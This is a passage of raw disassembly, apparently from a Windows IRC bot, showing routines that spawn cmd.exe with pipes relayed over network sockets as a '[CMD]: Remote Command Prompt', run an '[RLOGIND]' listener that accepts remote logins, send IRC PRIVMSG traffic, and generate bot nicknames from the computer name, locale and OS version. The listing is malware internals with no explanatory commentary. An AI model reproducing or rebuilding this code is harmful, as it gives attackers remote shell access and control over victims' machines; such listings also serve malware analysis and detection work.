mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_40ED58: ; CODE XREF: sub_40ED21+7C�j
push edi ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push 0
push edi
push eax
push dword_430550[esi]
call dword_42EBCC ; recv
test eax, eax
jle short loc_40ED9F
push 0
push eax
lea eax, [ebp+Dst]
push eax
push dword_43054C[esi]
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40ED58
loc_40ED9F: ; CODE XREF: sub_40ED21+61�j
push dword_430550[esi]
call dword_42EC48 ; closesocket
push [ebp+var_14]
call sub_411F56
pop ecx
push 0
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
sub_40ED21 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40EDBE proc near ; CODE XREF: sub_40EDEE+2A�p
; sub_40EE26+7E�p ...
mov eax, dword_475260
push esi
mov esi, ds:dword_41B050
cmp eax, 0FFFFFFFFh
jz short loc_40EDD2
push eax
call esi ; CloseHandle
loc_40EDD2: ; CODE XREF: sub_40EDBE+F�j
mov eax, dword_475268
cmp eax, 0FFFFFFFFh
jz short loc_40EDDF
push eax
call esi ; CloseHandle
loc_40EDDF: ; CODE XREF: sub_40EDBE+1C�j
mov eax, dword_47525C
cmp eax, 0FFFFFFFFh
jz short loc_40EDEC
push eax
call esi ; CloseHandle
loc_40EDEC: ; CODE XREF: sub_40EDBE+29�j
pop esi
retn
sub_40EDBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40EDEE(char *Str)
sub_40EDEE proc near ; CODE XREF: sub_409557+3DF4�p
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+Str] ; Str
call _strlen
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+Str]
push dword_475264
call ds:dword_41B054 ; WriteFile
test eax, eax
jnz short loc_40EE21
call sub_40EDBE
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40EE21: ; CODE XREF: sub_40EDEE+28�j
push 1
pop eax
leave
retn
sub_40EDEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40EE26(int,char *Str1,int)
sub_40EE26 proc near ; CODE XREF: sub_40EEAD+D3�p
; sub_40EEAD+F2�p ...
Str = byte ptr -200h
arg_0 = dword ptr 8
Str1 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_428D64 ; Str2
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40EE69
push 7D0h
call ds:dword_41B048 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+Str]
push [ebp+Str1]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax ; Dest
call _sprintf
add esp, 10h
jmp short loc_40EE80
; ---------------------------------------------------------------------------
loc_40EE69: ; CODE XREF: sub_40EE26+1A�j
push [ebp+arg_8]
lea eax, [ebp+Str]
push offset aS_2 ; "%s"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40EE80: ; CODE XREF: sub_40EE26+41�j
lea eax, [ebp+Str]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_0]
call dword_42EC00 ; send
test eax, eax
jg short loc_40EEA9
call sub_40EDBE
loc_40EEA9: ; CODE XREF: sub_40EE26+7C�j
xor eax, eax
leave
retn
sub_40EE26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EEAD proc near ; DATA XREF: sub_40F002+170�o
Dst = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset byte_47526C
loc_40EEC5: ; CODE XREF: sub_40EEAD+79�j
; sub_40EEAD+DB�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+Dst]
push esi
push eax
push dword_475260
call ds:dword_41B130 ; PeekNamedPipe
test eax, eax
jz loc_40EF93
cmp [ebp+var_4], edi
jnz short loc_40EF28
lea eax, [ebp+var_8]
push eax
push dword_47525C
call ds:dword_41B12C ; GetExitCodeProcess
test eax, eax
jz short loc_40EF1E
cmp [ebp+var_8], 103h
jnz loc_40EFB7
loc_40EF1E: ; CODE XREF: sub_40EEAD+62�j
push 0Ah
call ds:dword_41B048 ; Sleep
jmp short loc_40EEC5
; ---------------------------------------------------------------------------
loc_40EF28: ; CODE XREF: sub_40EEAD+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_40EF3F
loc_40EF2F: ; CODE XREF: sub_40EEAD+90�j
cmp [ebp+eax+Dst], 0Ah
jz short loc_40EF8D
inc eax
cmp eax, [ebp+var_4]
jb short loc_40EF2F
loc_40EF3F: ; CODE XREF: sub_40EEAD+80�j
mov [ebp+var_4], esi
loc_40EF42: ; CODE XREF: sub_40EEAD+E4�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+Dst]
push eax
push dword_475260
call ds:dword_41B04C ; ReadFile
test eax, eax
jz short loc_40EFDF
lea eax, [ebp+Dst]
push eax ; int
push ebx ; Str1
push dword_4752A0 ; int
call sub_40EE26
add esp, 0Ch
jmp loc_40EEC5
; ---------------------------------------------------------------------------
loc_40EF8D: ; CODE XREF: sub_40EEAD+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_40EF42
; ---------------------------------------------------------------------------
loc_40EF93: ; CODE XREF: sub_40EEAD+45�j
push offset aCmdCouldNotRea ; "[CMD]: Could not read data from procces"...
push ebx ; Str1
push dword_4752A0 ; int
call sub_40EE26
push [ebp+arg_0]
call sub_411F56
add esp, 10h
push 1
call ds:dword_41B06C ; ExitThread
loc_40EFB7: ; CODE XREF: sub_40EEAD+6B�j
call sub_40EDBE
push offset aCmdProccessHas ; "[CMD]: Proccess has terminated.\r\n"
push ebx ; Str1
push dword_4752A0 ; int
call sub_40EE26
push [ebp+arg_0]
call sub_411F56
add esp, 10h
push edi
call ds:dword_41B06C ; ExitThread
loc_40EFDF: ; CODE XREF: sub_40EEAD+C3�j
push offset aCmdCouldNotR_0 ; "[CMD]: Could not read data from procces"...
push ebx ; Str1
push dword_4752A0 ; int
call sub_40EE26
push [ebp+arg_0]
call sub_411F56
add esp, 10h
push edi
call ds:dword_41B06C ; ExitThread
sub_40EEAD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F002 proc near ; CODE XREF: sub_409557+4A31�p
Dest = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
Dst = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push ebx
push esi
push edi
call sub_40EDBE
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_42EC6C ; SearchPathA
test eax, eax
jz loc_40F0FC
push 1
lea eax, [ebp+var_1C]
pop ebx
mov edi, ds:dword_41B138
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_40F0FC
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_40F0FC
mov edi, ds:dword_41B100
push 3
push esi
push esi
push offset dword_475264
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_41B134 ; DuplicateHandle
test eax, eax
jz short loc_40F0FC
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_74]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+Dst]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
mov ebx, offset byte_428D64
push esi
lea eax, [ebp+var_178]
push ebx
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_41B094 ; CreateProcessA
test eax, eax
jnz short loc_40F104
loc_40F0FC: ; CODE XREF: sub_40F002+2F�j
; sub_40F002+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_40F1B2
; ---------------------------------------------------------------------------
loc_40F104: ; CODE XREF: sub_40F002+F8�j
push [ebp+var_4]
mov edi, ds:dword_41B050
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_475260, eax
mov eax, [ebp+var_8]
mov dword_475268, eax
mov eax, [ebp+Dst]
mov dword_47525C, eax
call edi ; CloseHandle
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov dword_4752A0, eax
jz short loc_40F13E
push [ebp+arg_4]
jmp short loc_40F13F
; ---------------------------------------------------------------------------
loc_40F13E: ; CODE XREF: sub_40F002+135�j
push ebx ; Format
loc_40F13F: ; CODE XREF: sub_40F002+13A�j
push offset byte_47526C ; Dest
call _sprintf
pop ecx
pop ecx
push esi ; int
push 7 ; int
push offset aCmdRemoteComma ; "[CMD]: Remote Command Prompt"
call sub_411C3A
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov dword_430548[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_40EEAD
push esi
push esi
call ds:dword_41B064 ; CreateThread
cmp eax, esi
mov dword_430554[edi], eax
jnz short loc_40F1B0
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dest]
push offset aCmdFailedToSta ; "[CMD]: Failed to start IO thread, error"...
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_402D63
add esp, 10h
loc_40F1B0: ; CODE XREF: sub_40F002+185�j
xor eax, eax
loc_40F1B2: ; CODE XREF: sub_40F002+FD�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F002 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F1B7 proc near ; DATA XREF: sub_40F445+1BE�o
var_3D4 = byte ptr -3D4h
Str1 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
Dest = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
Args = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
mov esi, eax
pop ecx
lea edi, [ebp+var_3D4]
push 1
mov [ebp+var_C], 1Eh
pop ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_43054C[eax]
xor edi, edi
mov [ebp+var_8], edi
mov [ebp+var_1F4], ebx
mov eax, [esi]
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call dword_42EB9C ; select
test eax, eax
jnz short loc_40F23B
push dword ptr [esi]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call sub_411F56
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
loc_40F23B: ; CODE XREF: sub_40F1B7+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call dword_42EBCC ; recv
lea eax, [ebp+Args]
push 10h
push eax
push dword ptr [esi]
call sub_40F3BC
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_40F3BC
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_40F3BC
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call dword_42EB1C ; getpeername
test eax, eax
jz short loc_40F2B4
call dword_42EB50 ; WSAGetLastError
push eax ; Args
push offset aRlogindErrorGe ; "[RLOGIND]: Error: getpeername(): <%d>."
call sub_402DD7
push [ebp+arg_0]
call sub_411F56
add esp, 0Ch
push edi
call ds:dword_41B06C ; ExitThread
loc_40F2B4: ; CODE XREF: sub_40F1B7+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call dword_42EB70 ; gethostbyaddr
cmp eax, edi
jnz short loc_40F2DE
push [ebp+var_18]
call dword_42EC3C ; inet_ntoa
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
jmp short loc_40F2EC
; ---------------------------------------------------------------------------
loc_40F2DE: ; CODE XREF: sub_40F1B7+10D�j
push dword ptr [eax] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
loc_40F2EC: ; CODE XREF: sub_40F1B7+125�j
pop ecx
pop ecx
push edi
push ebx
push offset byte_428D64
push dword ptr [esi]
call dword_42EC00 ; send
cmp dword_4752B0, edi
jnz short loc_40F34E
push [ebp+var_18]
lea eax, [ebp+Str1]
push eax ; Str1
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Args]
push eax ; Args
call sub_40F416
add esp, 10h
test eax, eax
jnz short loc_40F34E
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call dword_42EC00 ; send
push dword ptr [esi]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call sub_411F56
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
loc_40F34E: ; CODE XREF: sub_40F1B7+14C�j
; sub_40F1B7+16D�j
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Args]
push eax ; Args
push offset aRlogindUserLog ; "[RLOGIND]: User logged in: <%s@%s>."
call sub_402DD7
push [ebp+arg_0]
call sub_40FC5F
add esp, 10h
test eax, eax
jnz short loc_40F395
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax ; Args
push offset aRlogindErrorSe ; "[RLOGIND]: Error: SessionRun(): <%d>."
call sub_402DD7
push [ebp+arg_0]
call sub_411F56
add esp, 0Ch
push ebx
call ds:dword_41B06C ; ExitThread
loc_40F395: ; CODE XREF: sub_40F1B7+1B9�j
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Args]
push eax ; Args
push offset aRlogindUserL_0 ; "[RLOGIND]: User logged out: <%s@%s>."
call sub_402DD7
push [ebp+arg_0]
call sub_411F56
add esp, 10h
push edi
call ds:dword_41B06C ; ExitThread
sub_40F1B7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3BC proc near ; CODE XREF: sub_40F1B7+9A�p
; sub_40F1B7+A7�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_42EBCC ; recv
cmp eax, 1
jnz short loc_40F40C
mov esi, [ebp+arg_4]
loc_40F3DA: ; CODE XREF: sub_40F3BC+41�j
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_40F401
test al, al
jz short loc_40F410
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_42EBCC ; recv
cmp eax, 1
jz short loc_40F3DA
jmp short loc_40F40C
; ---------------------------------------------------------------------------
loc_40F401: ; CODE XREF: sub_40F3BC+27�j
push offset aRlogindProtoco ; "[RLOGIND]: Protocol string too long."
call sub_402DD7
pop ecx
loc_40F40C: ; CODE XREF: sub_40F3BC+19�j
; sub_40F3BC+43�j
xor eax, eax
jmp short loc_40F413
; ---------------------------------------------------------------------------
loc_40F410: ; CODE XREF: sub_40F3BC+2B�j
push 1
pop eax
loc_40F413: ; CODE XREF: sub_40F3BC+52�j
pop esi
leave
retn
sub_40F3BC endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40F416(char *Args,int,char *Str1)
sub_40F416 proc near ; CODE XREF: sub_40F1B7+163�p
Args = dword ptr 4
arg_4 = dword ptr 8
Str1 = dword ptr 0Ch
push [esp+Args] ; Str2
push [esp+4+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40F441
push [esp+arg_4]
push [esp+4+Args] ; Args
push offset aRlogindLoginRe ; "[RLOGIND]: Login rejected, Remote user:"...
call sub_402DD7
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40F441: ; CODE XREF: sub_40F416+11�j
push 1
pop eax
retn
sub_40F416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F445 proc near ; DATA XREF: sub_409557+48DA�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
Source = byte ptr -414h
var_214 = dword ptr -214h
Str = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
Dst = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
push 1
rep movsd
pop edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call dword_42EB38 ; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_40F49E
push eax ; Args
push offset aRlogindErrorWs ; "[RLOGIND]: Error: WSAStartup(): <%d>."
call sub_402DD7
push [ebp+var_4C]
call sub_411F56
add esp, 0Ch
push edi
call ds:dword_41B06C ; ExitThread
loc_40F49E: ; CODE XREF: sub_40F445+3A�j
push edi
push offset loc_40F6C3
call ds:dword_41B13C ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_40F4D7
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax ; Args
push offset aRlogindFaile_0 ; "[RLOGIND]: Failed to install control-C "...
call sub_402DD7
pop ecx
pop ecx
call dword_42EB20 ; WSACleanup
push [ebp+var_4C]
call sub_411F56
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
loc_40F4D7: ; CODE XREF: sub_40F445+67�j
push ebx
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_50]
call dword_42EBB4 ; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call dword_42EC30 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40F64E
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov dword_43054C[eax], ebx
lea eax, [ebp+Dst]
push eax
push ebx
call dword_42EBE0 ; bind
test eax, eax
jnz loc_40F64E
push 7FFFFFFFh
push ebx
call dword_42EBDC ; listen
test eax, eax
jnz loc_40F64E
push offset aRlogindReadyAn ; "[RLOGIND]: Ready and waiting for incomi"...
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_402D63
pop ecx
mov [ebp+arg_0], edi
loc_40F566: ; CODE XREF: sub_40F445+15A�j
; sub_40F445+1E4�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call dword_42EC44 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_40F651
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call dword_42EB94 ; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_40F566
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset aRlogindClientC ; "[RLOGIND]: Client connection from IP: %"...
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_402D63
push edi ; int
lea eax, [ebp+Source]
push 6 ; int
push eax ; Source
call sub_411C3A
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov dword_430544[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_40F1B7
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov dword_430554[ecx], eax
jz short loc_40F639
loc_40F626: ; CODE XREF: sub_40F445+1F2�j
cmp [ebp+var_38], esi
jnz loc_40F566
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40F626
; ---------------------------------------------------------------------------
loc_40F639: ; CODE XREF: sub_40F445+1DF�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax ; Args
push offset aRlogindFaile_1 ; "[RLOGIND]: Failed to start client threa"...
call sub_402DD7
pop ecx
pop ecx
jmp short loc_40F651
; ---------------------------------------------------------------------------
loc_40F64E: ; CODE XREF: sub_40F445+C8�j
; sub_40F445+EC�j ...
mov edi, [ebp+arg_0]
loc_40F651: ; CODE XREF: sub_40F445+13C�j
; sub_40F445+207�j
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+Source]
push offset aRlogindError_0 ; "[RLOGIND]: Error: server failed, return"...
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_40F691
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_40] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_405E64
add esp, 14h
loc_40F691: ; CODE XREF: sub_40F445+22A�j
lea eax, [ebp+Source]
push eax
call sub_402D63
pop ecx
push edi
call dword_42EC48 ; closesocket
push ebx
call dword_42EC48 ; closesocket
call dword_42EB20 ; WSACleanup
push [ebp+var_4C]
call sub_411F56
pop ecx
push esi
call ds:dword_41B06C ; ExitThread
pop ebx
loc_40F6C3: ; DATA XREF: sub_40F445+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_40F445 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40F6CD(char *Dest)
sub_40F6CD proc near ; CODE XREF: sub_40FA38+49�p
; DATA XREF: .data:off_427798�o
var_C = dword ptr -0Ch
Dest = dword ptr 4
push esi
push edi
call ds:dword_41B078 ; GetTickCount
push eax
call sub_41274C
mov edi, [esp+0Ch+Dest]
mov [esp+0Ch+var_C], offset aFf_1 ; "[FF]-"
push offset aS_2 ; "%s"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_424A64, esi
jle short loc_40F726
loc_40F700: ; CODE XREF: sub_40F6CD+57�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_424A64
jl short loc_40F700
loc_40F726: ; CODE XREF: sub_40F6CD+31�j
mov eax, edi
pop edi
pop esi
retn
sub_40F6CD endp
; =============== S U B R O U T I N E =======================================
sub_40F72B proc near ; CODE XREF: sub_409557+3601�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_41B078 ; GetTickCount
push eax
call sub_41274C
pop ecx
call _rand
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_424A64
test esi, esi
jle short loc_40F76E
loc_40F758: ; CODE XREF: sub_40F72B+41�j
call _rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40F758
loc_40F76E: ; CODE XREF: sub_40F72B+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40F72B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
and dword ptr [ebp-4], 0
push esi
push edi
mov dword ptr [ebp-8], 100h
call ds:dword_41B078 ; GetTickCount
push eax
call sub_41274C
pop ecx
lea eax, [ebp-8]
mov esi, offset byte_4277F4
push eax
push esi
call ds:dword_41B0FC ; GetComputerNameA
movsx eax, byte_4277F4
push 41h
pop ecx
push 1
pop edx
loc_40F7B4: ; CODE XREF: .text:0040F7BF�j
cmp eax, ecx
jnz short loc_40F7BB
mov [ebp-4], edx
loc_40F7BB: ; CODE XREF: .text:0040F7B6�j
inc ecx
cmp ecx, 5Bh
jl short loc_40F7B4
push 61h
pop ecx
loc_40F7C4: ; CODE XREF: .text:0040F7CF�j
cmp eax, ecx
jnz short loc_40F7CB
mov [ebp-4], edx
loc_40F7CB: ; CODE XREF: .text:0040F7C6�j
inc ecx
cmp ecx, 7Bh
jl short loc_40F7C4
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 0Ch
cmp dword_424A64, esi
jle short loc_40F810
loc_40F7EA: ; CODE XREF: .text:0040F80E�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_424A64
jl short loc_40F7EA
loc_40F810: ; CODE XREF: .text:0040F7E8�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_41B078 ; GetTickCount
push eax
call sub_41274C
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call ds:dword_41B140 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset dword_4277F8
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_424A64, esi
jle short loc_40F885
loc_40F85F: ; CODE XREF: .text:0040F883�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_424A64
jl short loc_40F85F
loc_40F885: ; CODE XREF: .text:0040F85D�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset byte_428D64
mov dword ptr [ebp-94h], 94h
call ds:dword_41B144 ; GetVersionExA
call ds:dword_41B078 ; GetTickCount
push eax
call sub_41274C
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_40F90F
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40F8EF
cmp dword ptr [ebp-84h], 1
jnz short loc_40F8DF
mov esi, offset a95 ; "95"
loc_40F8DF: ; CODE XREF: .text:0040F8D8�j
cmp dword ptr [ebp-84h], 2
jnz short loc_40F94B
mov esi, offset aNt ; "NT"
jmp short loc_40F94B
; ---------------------------------------------------------------------------
loc_40F8EF: ; CODE XREF: .text:0040F8CF�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_40F8FF
mov esi, offset a98 ; "98"
jmp short loc_40F94B
; ---------------------------------------------------------------------------
loc_40F8FF: ; CODE XREF: .text:0040F8F6�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_40F946
mov esi, offset aMe_0 ; "ME"
jmp short loc_40F94B
; ---------------------------------------------------------------------------
loc_40F90F: ; CODE XREF: .text:0040F8C6�j
cmp dword ptr [ebp-90h], 5
jnz short loc_40F946
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40F928
mov esi, offset a2k ; "2K"
jmp short loc_40F94B
; ---------------------------------------------------------------------------
loc_40F928: ; CODE XREF: .text:0040F91F�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_40F938
mov esi, offset aXp ; "XP"
jmp short loc_40F94B
; ---------------------------------------------------------------------------
loc_40F938: ; CODE XREF: .text:0040F92F�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40F94B
loc_40F946: ; CODE XREF: .text:0040F906�j
